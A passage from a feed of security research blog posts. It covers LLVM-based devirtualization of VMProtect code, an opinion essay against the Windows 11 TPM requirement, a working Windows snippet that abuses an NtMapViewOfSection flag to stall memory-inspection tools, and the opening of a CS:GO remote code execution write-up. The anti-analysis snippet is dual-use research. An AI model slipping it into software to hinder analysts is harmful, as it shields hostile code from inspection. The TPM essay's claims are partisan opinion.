  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the sliced program counter
  return vip;
}

The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value and therefore useful if related to the computation of the sliced expression, but with their liveness scope ending at the end of the function, which guarantees that there won’t be store operations to the host context that could possibly bloat the code.

The steps to use the above helper function are:

  • The HelperSlicePC is cloned into a new throwaway function;
  • The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
  • The called function is forcefully inlined into the HelperSlicePC function;
  • The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.

The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.

define dso_local i64 @HelperSlicePC(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #5 {
  %1 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1) #4, !srcloc !9
  %2 = extractvalue { i32, i32, i32, i32 } %1, 0
  %3 = and i32 %2, 4080
  %4 = icmp eq i32 %3, 4064
  %5 = select i1 %4, i64 5371013457, i64 5371013227
  ret i64 %5
}

In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.

Exploration

The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.

The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.

Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).

Partial CFG

A partial control flow graph is a control flow graph built connecting the currently explored basic blocks given the known edges between them. The idea behind building it, is that each time that we explore a new basic block, we gather new outgoing edges that could lead to new unexplored basic blocks, or even to known basic blocks. Every new edge between two blocks is therefore adding information to the entire control flow graph and we could actually propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.

Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.

Motivating example #1

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.

Motivating example 1

Let’s assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of the sole basic block B, obtaining an access into a constant array with a 64 bits symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.

To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint is locally near to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.

Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.

Motivating example #2

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.

Motivating example 2

Let’s assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (BCEB) and we know that starting from B we can reach two edges (BC and DF, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge EB, may not be anymore and therefore will need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.

As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running till the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path and only at the iteration N the other path would be explored. That’s the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).

Building the partial CFG with LLVM instead, would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant) or the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.

The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.

start:
  mov rax, 2000
  mov rbx, 0
loop:
  inc rbx
  cmp rbx, rax
  jne loop

The original assembly snippet.

define dso_local i64 @FirstSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = call i64 @HelperKeepPC(i64 5369464257)
  ret i64 %1
}

The first partial CFG obtained during the exploration phase

define dso_local i64 @SecondSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  %5 = select i1 %4, i64 5369183207, i64 5369464257
  %6 = call i64 @HelperKeepPC(i64 %5)
  %7 = icmp eq i64 %6, 5369464257
  br i1 %7, label %1, label %8

8:                                                ; preds = %1
  ret i64 233496237
}

The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeaddead (233496237) value, meaning that the VmBlock instructions haven’t been lifted yet.

define dso_local i64 @F_0x14000101f_NoLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  br i1 %4, label %5, label %1

5:                                                ; preds = %1
  store i64 %3, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The final CFG obtained at the completion of the exploration phase.

define dso_local i64 @F_0x14000101f_WithLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  store i64 2000, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The loop-optimized final CFG obtained at the completion of the exploration phase.

The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.

Pseudocode

Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following:

  1. We initialize the algorithm creating:

    • A stack of addresses of VmBlocks to explore, referred to as Worklist;
    • A set of addresses of explored VmBlocks, referred to as Explored;
    • A set of addresses of VmBlocks to reprove, referred to as Reprove;
    • A map of known edges between the VmBlocks, referred to as Edges.
  2. We push the address of the entry VmBlock into the Worklist;
  3. We fetch the address of a VmBlock to explore, we lift it to LLVM-IR if met for the first time, we build the partial CFG using the knowledge from the Edges map and we slice the branch condition of the current VmBlock. Finally we feed the branch condition to Souper, which will process the expression harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions, incrementally rejecting the known solutions up to some limit (worst case) or till all the solutions have been found.
  4. Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:

    • We verify if each solved edge is leading to a known VmBlock; if it is, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock and we proceed with adding the addresses of all the VmBlocks reachable by the known VmBlock to the Reprove set and removing them from the Explored set; to speed things up, we can eventually skip each VmBlock known to be firmly unconditional;
    • We update the Edges map with the newly solved edges.
  5. At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing it in the process and jumping back to step 3. If also the Reprove set is empty, it means we explored the whole CFG and eventually reproved all the VmBlocks that obtained new predecessors during the exploration phase.

As mentioned at the start of the section, there are many ways to explore a virtualized CFG and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could eventually fall back to the pattern matching based solution at need. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.

The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.

Pipeline

So far we hinted at the underlying usage of LLVM’s optimization and analysis passes multiple times through the sections, so we can finally take a look at: how they fit in, their configuration and their limitations.

Managing the pipeline

Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes, instead of wasting cycles on passes that we know a priori don’t have any effect on the lifted LLVM-IR code. Additionally, by default, LLVM is providing a chain of optimizations which is executed once, is meant to optimize non-obfuscated code and should be as efficient as possible.

Although, in our case, we have different needs and want to be able to:

  • Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
  • Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
  • Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).

LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there won’t be any more changes or until a threshold will be reached:

void optimizeFunction(llvm::Function *F, OptimizationGuide &G) {
  // Fetch the Module
  auto *M = F->getParent();
  // Create the function pass manager
  llvm::legacy::FunctionPassManager FPM(M);
  // Initialize the pipeline
  llvm::PassManagerBuilder PMB;
  PMB.OptLevel = 3;
  PMB.SizeLevel = 2;
  PMB.RerollLoops = false;
  PMB.SLPVectorize = false;
  PMB.LoopVectorize = false;
  PMB.Inliner = createFunctionInliningPass();
  // Add the alias analysis passes
  FPM.add(createCFLSteensAAWrapperPass());
  FPM.add(createCFLAndersAAWrapperPass());
  FPM.add(createTypeBasedAAWrapperPass());
  FPM.add(createScopedNoAliasAAWrapperPass());
  // Add some useful LLVM passes
  FPM.add(createCFGSimplificationPass());
  FPM.add(createSROAPass());
  FPM.add(createEarlyCSEPass());
  // Add a custom pass here
  if (G.RunCustomPass1)
    FPM.add(createCustomPass1(G));
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Add a custom pass here
  if (G.RunCustomPass2)
    FPM.add(createCustomPass2(G));
  FPM.add(createGVNHoistPass());
  FPM.add(createGVNSinkPass());
  FPM.add(createDeadStoreEliminationPass());
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Execute the pipeline
  size_t minInsCount = F->getInstructionCount();
  size_t pipExeCount = 0;
  FPM.doInitialization();
  do {
    // Reset the IR changed flag
    G.HasChanged = false;
    // Run the optimizations
    FPM.run(*F);
    // Check if the function changed
    size_t curInsCount = F->getInstructionCount();
    if (curInsCount < minInsCount) {
      minInsCount = curInsCount;
      G.HasChanged |= true;
    }
    // Increment the execution count
    pipExeCount++;
  } while (G.HasChanged && pipExeCount < 5);
  FPM.doFinalization();
}

The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.

Configuration

As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.

In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it is fully overwriting the store at line 6, writing the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn’t do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The reason for the difference is entirely associated to a conservative configuration of the DSE pass, which by default (at the time of writing), is walking up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating some code.

Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.

Limitations

When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.

IsGuaranteedLoopInvariant (DSE, MSSA)

While looking at some devirtualized code, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuarenteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.

GetPointerBaseWithConstantOffset (DSE)

While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offsetted between each other. The solution is making use of another patch which is providing information about the offsets of the memory slots: D93529.

Shift-Select folding (InstCombine)

And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.

What’s next?

In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.

Windows 11: TPMs and Digital Sovereignty

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

23 May 2021 at 23:00
By: jm

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Conclusion

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

